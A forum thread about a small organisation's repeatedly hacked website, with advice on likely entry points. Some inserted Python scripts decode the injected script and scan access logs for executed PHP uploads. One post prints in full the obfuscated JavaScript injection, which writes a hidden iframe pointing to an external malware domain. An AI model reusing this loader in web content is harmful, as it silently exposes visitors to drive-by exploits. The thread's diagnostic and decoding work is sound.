Sites keep getting hacked

Got into work this morning only to find one of our sites has been hacked and malicious code added to the index.php header.

The code itself was JavaScript gibberish, but because of that Google has now flagged the site as malicious. I can't for the life of me see how they are doing it?
 
Can you check your server access logs? I've seen this happen from both leaked passwords (check your FTP log) as above or from using old versions of libraries which are exploitable, i.e. a dodgy file upload component which allows PHP files to be uploaded and executed (check your webserver log).
 
Maybe the PHP code itself is insecure.

If you're only using cPanel for yourself, turn it off until you need it and keep it patched.
 
What kind of site is it - custom job or an off-the-shelf affair like WordPress, Joomla etc.?
Is it on shared hosting or your own box in a datacentre / in your office etc?
 
Custom site on shared hosting, provided by a third-party company who deal mostly with charitable organisations.

We've managed to resolve it now though, changed all passwords etc., so hopefully it won't happen again.

There's no specific code on our site that would enable them to inject or upload files without using FTP.
 
If it's a shared host, then if one site on the box gets hacked the attacker may have the ability to update all pages across all domains. Just because your site is secure, it doesn't mean everyone else's is :(

Glad you cleaned it up.
 
If it's a shared host, then if one site on the box gets hacked the attacker may have the ability to update all pages across all domains.

This is unlikely to be the case with most hosting providers in this day and age.
 
It was obfuscated java that got added to some of the files. Also noticed that on one of our sites used for testing, someone had uploaded several folders of files, one of which was a known hacking tool used for distributed computing hack thingies.
 
Code:
<script language=JavaScript>

var zpkqvadrdax = 'YzysAWyJaJ3cYzysAWyJaJ69YzysAWyJaJ66';var tqswscplhbk = 'YzysAWyJaJ72';var qjmlioubyfr = 'YzysAWyJaJ61YzysAWyJaJ6dYzysAWyJaJ65YzysAWyJaJ20YzysAWyJaJ6eYzysAWyJaJ61YzysAWyJaJ6dYzysAWyJaJ65YzysAWyJaJ3dYzysAWyJaJ22';var wwmjadmaalr = 'YzysAWyJaJ70YzysAWyJaJ78YzysAWyJaJ62YzysAWyJaJ6dYzysAWyJaJ6dYzysAWyJaJ66YzysAWyJaJ7aYzysAWyJaJ68YzysAWyJaJ78YzysAWyJaJ62YzysAWyJaJ6b';var vhjvxvdyfri = 'YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ77YzysAWyJaJ69YzysAWyJaJ64YzysAWyJaJ74YzysAWyJaJ68YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ31YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ68YzysAWyJaJ65YzysAWyJaJ69YzysAWyJaJ67YzysAWyJaJ68YzysAWyJaJ74YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ30YzysAWyJaJ22';var xdqgxsedjna = 'YzysAWyJaJ20YzysAWyJaJ73YzysAWyJaJ72YzysAWyJaJ63YzysAWyJaJ3dYzysAWyJaJ22';var nwazibauttc = 'YzysAWyJaJ68YzysAWyJaJ74YzysAWyJaJ74YzysAWyJaJ70YzysAWyJaJ3aYzysAWyJaJ2fYzysAWyJaJ2f';var ypzysyejgvn = 'www.moscowismine.in/eclipsework/index.php';var ubkpgoyuouq = 'YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ6dYzysAWyJaJ61YzysAWyJaJ72YzysAWyJaJ67YzysAWyJaJ69YzysAWyJaJ6eYzysAWyJaJ77YzysAWyJaJ69YzysAWyJaJ64YzysAWyJaJ74YzysAWyJaJ68YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ31YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ6dYzysAWyJaJ61YzysAWyJaJ72YzysAWyJaJ67YzysAWyJaJ69YzysAWyJaJ6eYzysAWyJaJ68YzysAWyJaJ65YzysAWyJaJ69YzysAWyJaJ67YzysAWyJaJ68YzysAWyJaJ74YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ30YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ74YzysAWyJaJ69YzysAWyJaJ74YzysAWyJaJ6cYzysAWyJaJ65YzysAWyJaJ3dYzysAWyJaJ22';var ytzrtuknwoc = 'YzysAWyJaJ70YzysAWyJaJ78YzysAWyJaJ62YzysAWyJaJ6dYzysAWyJaJ6dYzysAWyJaJ66YzysAWyJaJ7aYzysAWyJaJ68YzysAWyJaJ78YzysAWyJaJ62YzysAWyJaJ6b';var nmuvrdcmrzo = 
'YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ73YzysAWyJaJ63YzysAWyJaJ72YzysAWyJaJ6fYzysAWyJaJ6cYzysAWyJaJ6cYzysAWyJaJ69YzysAWyJaJ6eYzysAWyJaJ67YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ6eYzysAWyJaJ6fYzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ62YzysAWyJaJ6fYzysAWyJaJ72YzysAWyJaJ64YzysAWyJaJ65YzysAWyJaJ72YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ30YzysAWyJaJ22YzysAWyJaJ20YzysAWyJaJ66YzysAWyJaJ72YzysAWyJaJ61YzysAWyJaJ6dYzysAWyJaJ65YzysAWyJaJ62YzysAWyJaJ6fYzysAWyJaJ72YzysAWyJaJ64YzysAWyJaJ65YzysAWyJaJ72YzysAWyJaJ3dYzysAWyJaJ22YzysAWyJaJ30YzysAWyJaJ22YzysAWyJaJ3e';var povqnpfhgvb = 'YzysAWyJaJ3cYzysAWyJaJ2fYzysAWyJaJ69YzysAWyJaJ66';var omvaxiwlkty = 'YzysAWyJaJ72YzysAWyJaJ61';var sopiqcapqce = 'YzysAWyJaJ6dYzysAWyJaJ65YzysAWyJaJ3e';var ysrbyzhtanf = new Array();ysrbyzhtanf[0]=new Array(zpkqvadrdax+tqswscplhbk+qjmlioubyfr+wwmjadmaalr+vhjvxvdyfri+xdqgxsedjna+nwazibauttc+ypzysyejgvn+ubkpgoyuouq+ytzrtuknwoc+nmuvrdcmrzo+povqnpfhgvb+omvaxiwlkty+sopiqcapqce);document['YzysAWyJaJwYzysAWyJaJrYzysAWyJaJiYzysAWyJaJtYzysAWyJaJeYzysAWyJaJ'.replace(/YzysAWyJaJ/g,'')](window['YzysAWyJaJuYzysAWyJaJnYzysAWyJaJeYzysAWyJaJsYzysAWyJaJcYzysAWyJaJaYzysAWyJaJpYzysAWyJaJeYzysAWyJaJ'.replace(/YzysAWyJaJ/g,'')](ysrbyzhtanf.toString().replace(/YzysAWyJaJ/g,'%')));</script>
That's the code used, if anyone is interested.

*********** please delete this admins if it's nasty ***********
 
Fairly typical malware code. Anyone visiting an infected webpage loads another webpage (in this case a Russian malware site on an Indian domain?!) which hosts the real malware. The malware site will then use browser exploits to download other malware to the user's PC.

Great way to ruin the rep of your business also if you don't plug the hole.

Google's advisory on the domain:
http://www.google.com/safebrowsing/diagnostic?site=moscowismine.in/
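The decoding the post above describes, as an added example (not the thread's code): the loader's own `.replace(/MARKER/g,'%')` call gives away the junk marker, so the hidden HTML can be recovered statically without running any JavaScript. The sample is constructed in the same scheme with an invented marker, variable names and URL.

```python
"""Static triage of marker-padded script injections: recover the hidden HTML without running JS."""
import re
from urllib.parse import unquote

# The loader gives away the junk marker: `.replace(/MARKER/g,'%')` turns each
# 'MARKERxx' into '%xx' just before unescape().
MARKER_RE = re.compile(r"\.replace\(/([A-Za-z0-9]+)/g,\s*'%'\)")
ASSIGN_RE = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'")        # var x = '...'
CONCAT_RE = re.compile(r"\(\s*(\w+(?:\s*\+\s*\w+)+)\s*\)")    # (a+b+c+...)


def decode_marker_script(script: str) -> str:
    """Rebuild the string the script would pass to document.write()."""
    marker = MARKER_RE.search(script)
    if marker is None:
        raise ValueError("no marker->'%' replace call; not this family")
    fragments = dict(ASSIGN_RE.findall(script))
    best = []
    for m in CONCAT_RE.finditer(script):     # longest chain of known fragments
        names = [n.strip() for n in m.group(1).split("+")]
        if all(n in fragments for n in names) and len(names) > len(best):
            best = names
    if not best:
        raise ValueError("no concatenation of known fragments found")
    encoded = "".join(fragments[n] for n in best)
    # Plain fragments (the host/path) carry no marker and pass through unchanged.
    return unquote(encoded.replace(marker.group(1), "%"))


def referenced_urls(html: str) -> list:
    """src= targets in the decoded HTML, for blocklisting and reporting."""
    return re.findall(r'src=["\']([^"\']+)', html)


# Constructed sample in the thread's scheme (marker 'QqZz', invented names/URL).
SAMPLE = (
    "<script language=JavaScript>var aa = 'QqZz3cQqZz69QqZz66QqZz72';"
    "var bb = 'QqZz61QqZz6dQqZz65QqZz20QqZz73QqZz72QqZz63QqZz3dQqZz22';"
    "var cc = 'QqZz68QqZz74QqZz74QqZz70QqZz3aQqZz2fQqZz2f';"
    "var dd = 'example.invalid/landing.php';"
    "var ee = 'QqZz22QqZz20QqZz77QqZz69QqZz64QqZz74QqZz68QqZz3dQqZz22QqZz31QqZz22"
    "QqZz20QqZz68QqZz65QqZz69QqZz67QqZz68QqZz74QqZz3dQqZz22QqZz30QqZz22QqZz3e';"
    "var ff = 'QqZz3cQqZz2fQqZz69QqZz66QqZz72QqZz61QqZz6dQqZz65QqZz3e';"
    "var arr = new Array();arr[0]=new Array(aa+bb+cc+dd+ee+ff);"
    "document['QqZzwQqZzrQqZziQqZztQqZze'.replace(/QqZz/g,'')](window['QqZzu"
    "QqZznQqZzeQqZzsQqZzcQqZzaQqZzpQqZze'.replace(/QqZz/g,'')]"
    "(arr.toString().replace(/QqZz/g,'%')));</script>"
)

if __name__ == "__main__":
    html = decode_marker_script(SAMPLE)
    print(html, "\nexternal references:", referenced_urls(html))
```

Run the same function over the real injected file to get the hidden iframe and its src without ever loading the page in a browser.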
 
Well, got into work this morning after a long weekend off only to find 2 of the domains have been hacked again.

Both domains had passwords changed from a clean machine so they must be getting in using another method. Passwords would have been impossible to guess.
 
Check the website access logs (Apache / IIS logs etc.). Are you sure you don't have any dodgy third-party components?
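The log check suggested here and in the earlier reply (an uploaded PHP file that then gets executed, visible in the webserver log), as an added example that is not from the thread: it parses Apache-style combined log lines, flags PHP served from directories that should only hold static uploads, and lists the same client's earlier POSTs as the likely upload. The log lines are constructed.

```python
"""Triage of web-server access logs for the 'uploaded PHP file, then executed' pattern."""
import re
from collections import defaultdict

# Apache/nginx "combined" log format (referrer and user agent optional).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)
# Directories that should serve static uploads only, never execute code (assumed layout).
UPLOAD_DIRS = ("/uploads/", "/images/", "/files/", "/tmp/")


def parse(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def suspicious_requests(lines):
    """Findings: PHP executed (HTTP 200) from an upload directory, plus the
    POSTs that preceded it from the same IP, i.e. the probable upload request."""
    posts_by_ip = defaultdict(list)
    findings = []
    for line in lines:
        r = parse(line)
        if r is None:
            continue
        if r["method"] == "POST":
            posts_by_ip[r["ip"]].append(r["path"])
        path = r["path"].split("?", 1)[0].lower()
        if (path.endswith((".php", ".phtml", ".php5"))
                and path.startswith(UPLOAD_DIRS) and r["status"] == "200"):
            findings.append({"ip": r["ip"], "executed": r["path"], "time": r["ts"],
                             "prior_posts": list(posts_by_ip[r["ip"]])})
    return findings


# Constructed log lines (RFC 5737 test addresses, invented paths).
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Mar/2009:08:02:11 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2009:08:02:40 +0000] "POST /contact.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2009:08:02:45 +0000] "GET /uploads/cv.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Mar/2009:08:05:01 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Mar/2009:08:05:02 +0000] "GET /uploads/old.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in suspicious_requests(SAMPLE_LOG):
        print(f)
```

A hit is a starting point, not proof: confirm by checking the file's mtime and owner on disk and the FTP log for the same window.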
 